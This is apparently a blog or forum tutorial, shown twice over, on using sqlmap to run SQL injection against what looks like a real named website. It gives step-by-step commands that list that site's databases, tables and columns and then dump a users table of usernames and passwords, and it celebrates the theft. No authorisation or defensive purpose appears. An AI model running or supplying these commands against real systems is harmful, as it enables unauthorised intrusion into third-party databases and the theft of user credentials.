|TUTORIAL| SQL INJECTION USING SQLMAP |TUTORIAL|
Welcome to my tutorial on sqlmap,
So lets start,
About sqlmap:-sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
download sqlmap from:-Here
It is coded in python and is the best tool available for sql injection!!!!
it can be run even if you are on windows,
first of all download python for windows from the official python site:-Here
i have installed it in:-C:\Documents and Settings\USER\sqlmap
now go to cmd prompt and type sqlmap\sqlmap.py
you should get something like "press enter to continue"!!!
sqlmap\sqlmap.py -u <website>
then it will be:-
sqlmap\sqlmap.py -u http://www.dulcemaria.live.mx/gallery.php?id=1
to find databese type:-
sqlmap\sqlmap.py -u http://www.dulcemaria.live.mx/gallery.php?id=1 --dbs
i got two databases:-
1.dulcem
2.information_schema
to find tables from the database dulcem type:-
-u http://www.dulcemaria.live.mx/gallery.php?id=1 --tables -D dulcem
then we get many tables i'll chose:-dulcemaria_users
for finding columns from the tables dulcemaria_users type:-
-u http://www.dulcemaria.live.mx/gallery.php?id=1 --columns -T dulcemaria_users -D dulcem
if you want to dump all columns type:-
-u http://www.dulcemaria.live.mx/gallery.php?id=1 --tables -D dulcem --dump-all
i got three columns:-
1.id
2.password
3.user
to dump them type:-
-u http://www.dulcemaria.live.mx/gallery.php?id=1 --columns -T dulcemaria_users -D dulcem --dump
Cheers!....we have dumped the usernames and passwords
to check them go to the path you installed sqlmap!!!
mine is:-C:\Documents and Settings\USER\sqlmap\output
you will find a folder named output,you will have your dumped data there.
Enjoy..
So lets start,
About sqlmap:-sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
download sqlmap from:-Here
It is coded in python and is the best tool available for sql injection!!!!
it can be run even if you are on windows,
first of all download python for windows from the official python site:-Here
i have installed it in:-C:\Documents and Settings\USER\sqlmap
now go to cmd prompt and type sqlmap\sqlmap.py
you should get something like "press enter to continue"!!!
sqlmap\sqlmap.py -u <website>
then it will be:-
sqlmap\sqlmap.py -u http://www.dulcemaria.live.mx/gallery.php?id=1
to find databese type:-
sqlmap\sqlmap.py -u http://www.dulcemaria.live.mx/gallery.php?id=1 --dbs
i got two databases:-
1.dulcem
2.information_schema
to find tables from the database dulcem type:-
-u http://www.dulcemaria.live.mx/gallery.php?id=1 --tables -D dulcem
then we get many tables i'll chose:-dulcemaria_users
for finding columns from the tables dulcemaria_users type:-
-u http://www.dulcemaria.live.mx/gallery.php?id=1 --columns -T dulcemaria_users -D dulcem
if you want to dump all columns type:-
-u http://www.dulcemaria.live.mx/gallery.php?id=1 --tables -D dulcem --dump-all
i got three columns:-
1.id
2.password
3.user
to dump them type:-
-u http://www.dulcemaria.live.mx/gallery.php?id=1 --columns -T dulcemaria_users -D dulcem --dump
Cheers!....we have dumped the usernames and passwords
to check them go to the path you installed sqlmap!!!
mine is:-C:\Documents and Settings\USER\sqlmap\output
you will find a folder named output,you will have your dumped data there.
Enjoy..
![What is Metasploit? [Explained for Beginners]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrPzNN5Q2d8rSwKSDgSQJM4mTMbilpz-Z90Cm-rY7HS63GFG5pc_Cd28tseZFS_uhGsN46wG2oTWjl9lpigS8nQvjWgpDmmViF6oMnObq6OPCIsHiHSFryFSB1mhyqtatbtyI22d-wTLM/s72-c/Metasploit.jpeg)
0 comments :
Post a Comment